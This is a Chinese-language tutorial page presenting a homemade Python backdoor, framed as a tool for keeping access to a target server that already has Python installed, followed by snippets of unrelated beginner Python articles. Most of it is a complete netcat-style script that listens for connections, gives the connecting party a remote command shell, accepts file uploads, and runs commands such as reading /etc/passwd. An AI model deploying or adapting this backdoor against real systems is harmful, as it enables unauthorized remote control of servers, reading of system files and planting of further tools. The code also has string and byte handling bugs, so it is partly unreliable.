2. 程式人生 > >Python入門:python自制後門程式

Python入門:python自制後門程式

阿新 發佈:2019-01-28

應該場景:

1、當目標伺服器上有python環境(一般linux系統都會預安裝)
2、目標伺服器上不允許安裝其它工具(因為要留後門或進一步攻擊內容就需要上傳各種工具)

#python3.5


import sys
import socket
import getopt
import threading
import subprocess

#全域性引數初始化
listen              = False
command             = False
upload              = False
execute             = ""
target              = ""
 

upload_destination  = ""
port                = 0

def usage():
    print("BHP Net Tool")
    print("Usage: bhpnet.py -t target_host -p port")
    print("-l --listen              - listen on [host]:[port] for"
          " incoming connections")
    print("-e --execute=file_to_run - execute the given file upon"
 

          " receiving a connection")
    print("-c --command             - initialize a command shell")
    print("-u --upload=destination  - upon receiving connection upload a"
          " file and write to [destination]")
    print("Examples:")
    print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c")
    print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=:\\target.exe"
 
)
    print("bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"")
    print("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
    sys.exit(0)

def main():
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()
        print("--------")
    try:
        opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",
                                  ["help","listen","execute","target","port","command","upload"])
    except getopt.GetoptError as err:
        print(str(err))
        usage()

    for o,a in opts:
        if o in ("-h","--help"):
            usage()
        elif o in ("-l","--listen"):
            listen = True
        elif o in ("-e","--execute"):
            execute = a
        elif o in ("-c","--commandshell"):
            command = True
        elif o in ("-u","--upload"):
            upload_destination = a
        elif o in ("-t","--target"):
            target = a
        elif o in ("-p","--port"):
            port = int(a)
        else:
            assert False,"Unhandled Option"

    if not listen and len(target) and port > 0:
        buffer = sys.stdin.read()

        client_sender(buffer)

    if listen:
        server_loop()



def client_sender(buffer):
    client = socket.socket()
    try:
        client.connect((target,port))

        if len(buffer):
            client.send(buffer)
        while True:
            recv_len = 1
            response = ""

            while recv_len:
                data = client.recv(1024)
                recv_len = len(data)
                response += data

                if recv_len < 4096:
                    break
            print(response)
            buffer = input("")
            buffer += "\n"

            client.send(buffer)
    except:
        print("[*] Exception! Exiting.")

    client.close()

def server_loop():
    global target

    if not len(target):
        target = "0.0.0.0"

    server = socket.socket()
    server.bind((target,port))

    server.listen(5)

    while True:
        client_socket,addr = server.accept()

        client_thred = threading.Thread(target=client_handler,args=(client_socket,))
        client_thred.start()

def run_command(command):
    command = command.rstrip()
    try:
        output = subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True)
    except:
        output = "Falsed to execute command.\r\n"
    return output

def client_handler(client_socket):
    global upload
    global execute
    global command

    if len(upload_destination):
        file_buffer = ""

        while True:
            data = client_socket.recv(1024)

            if not data:
                break
            else:
                file_buffer += data

        try:
            file_descriptor = open(upload_destination,"wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()

            client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
        except:
            client_socket.send("Failed to save file to %s\r\n" % upload_destination)

    if len(execute):
        output = run_command(execute)
        client_socket.send(output)

    if command:
        while True:
            client_socket.send("BHP:#> ".encode())

            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024).decode()
                response = run_command(cmd_buffer.encode())
                client_socket.send(response)

main()

相關推薦

Python入門python自制後門程式

應該場景: 1、當目標伺服器上有python環境(一般linux系統都會預安裝) 2、目標伺服器上不允許安裝其它工具(因為要留後門或進一步攻擊內容就需要上傳各種工具) #python3.5 import sys import socket impo

零基礎python入門從一個小程式開始

一般來說,學習程式設計,都喜歡從講語法開始,這是現行的大多數思路。但是程式語言很多,對應的語法大同小異,雖然在有些應用上有差別,在程式設計思想上有不同,但是最基礎的東西,永遠都是C裡面提到那些,判斷語句,迴圈語句,分支語句等等,拿變數定義來說: C語言: unsign

給有C或C++基礎的Python入門 Python Crash Course 4 操作列表 4.4 -- 4.5

可變 ont ++i however str 入門 重新 ike 倒數 上接前一篇文章。 4.4 使用列表的一部分   一,切片   切邊,顧名思義,就是處理列表的部分元素。   我們可以聯系一下C++的一段語句:for(int i = 0; i < n

python入門輸出1-100之內的所有奇數和偶數

utf env false 報錯 pytho 賦值 1-1 pass 所有 1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 #輸出1-100之內的所有奇數和偶數 4 """ 5 給start賦值等於1,whi

python入門求1-2+3-4+5...99的所有數的和(自寫)

== 余數 奇數 nbsp int 當前 pre span bre 1 #!/usr/bin/env pyhton 2 # -*- coding:utf-8 -*- 3 #求1-2+3-4+5...99的所有數的和(自寫) 4 """ 5 給x賦值為0,給y賦值

python入門1-99所有數的和的等式

print spa color python入門 空白 env temp 字符串 如果 1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 #1-99所有數的和的等式 4 #start(開始,譯音:思達二測)sum

Python入門內置函數

img 最大 -c 實例 aabb stdout 展示 sys code 可創建一個整數列表,一般用在 for 循環中。 函數語法 range(start, stop[, step]) 參數說明: start: 計數從 start 開始。默認是從 0 開始。例如

python入門基礎語法

基礎語法 交互式解釋器: 使用python自帶程序IDLE,啟動後可看到類似下面提示符:表達式:由一個或者幾個數字或者變量和運算符組合成的一行代碼,通常返回一個值。運算符: 運算符用於執行程序代碼運算,會針對一個以上 操作數項目來進行運算。例如:2+3,其操作數是2和3,而運算符則是“+”算術運算符(+、-、

Python 入門基本語法

2.7 oop 全路徑 perl 雙引號 one map 基本數據 安裝路徑 對於多數從其他編程語言轉入Python的來說,或多或少會有些不習慣。如果沿用其他編程語言的語法來寫Python代碼,那麽碰壁是不可避免的了。 本文是基於我看了兩個小時的官方文檔(Python 2

python入門字符串

字符串所有標準序列操作(索引、切片、乘法、成員檢查、長度、最小值、最大值)都適用於字符串,但是字符串是不可變的,因此所有的元素賦值和切片賦值都是非法的。a = 'http://www.python.org'a[-3:]='com'Traceback (most recent c

python入門UTF-8轉換成GBK編碼

終端 nco 什麽 等於 windows 就是 python 2 類型 window 1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 #UTF-8轉換成GBK編碼 4 #temp(臨時雇員,譯音:泰坡) 5

python入門求1-2+3-4+5...99的所有數的和

== python入門 ... sta rt+ color python while style 1 start =1 2 sum =0 3 while start <100: 4 if start % 2 ==0: 5 sum =sum -

Python入門生成器&叠代器

lis bject 很大的 als 可能 類型 事情 我們 不能 一、列表生成式 現在有個需求,列表[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],要求你把列表裏的每個值加1,怎麽實現?你可能會想到2種方式 二逼青年版 a = [0, 1,

python入門shelve模塊

PE 通過 簡單的 數據 test pre ike 內存 打開 shelve模塊是一個簡單的k,v將內存數據通過文件持久化的模塊,可以持久化任何pickle可支持的python數據# pickle進行了封裝,可以dump多次# 序列化import shelvef = she

Python入門集合操作

關系 重復 nbsp not 測試 inter CA not in nio 集合是一個無序的、不重復的數據組合,它的主要作用如下: (1)去重,把一個列表變成集合,就自動去重了 (2)關系測試,測試兩組數據之間的交集、差集、並集等關系 操作如下: l

Python入門生成器應用-斐波拉契數列

ner 賦值 斐波拉契 元組 return ext 生成 顯示 bsp 例子: 1,1,2,3,5,8,13,21...... def fib(max):   n,a,b=0,0,1   while n<max:     #print(b)     yield(b)

Python入門零碎知識點

矩陣 ber pos 二維 () ans transpose arr code zip() 用於將可叠代的對象作為參數,將對象中對應的元素打包成一個個元組,然後返回由這些元組組成的列表。 如果各個叠代器的元素個數不一致,則返回列表長度與最短的對象相同,利用 * 號操

Python入門3.1判斷

布林值 1>2 #False 1<2<3 #True 42!-'42' #True 'Name'=='name' #Fales 'M' in 'Magi

Python入門3.2條件控制

if…else 條件控制就是if…else的使用 if condition: #關鍵字 成立條件 do something #縮排 執行語句 else: #關鍵字 do something #縮排

Python入門3.3迴圈.md

for迴圈 for ever_letter in 'Hello world': print(ever_letter) #for item in iterable: #關鍵字 元素 關鍵字 集合 # do someth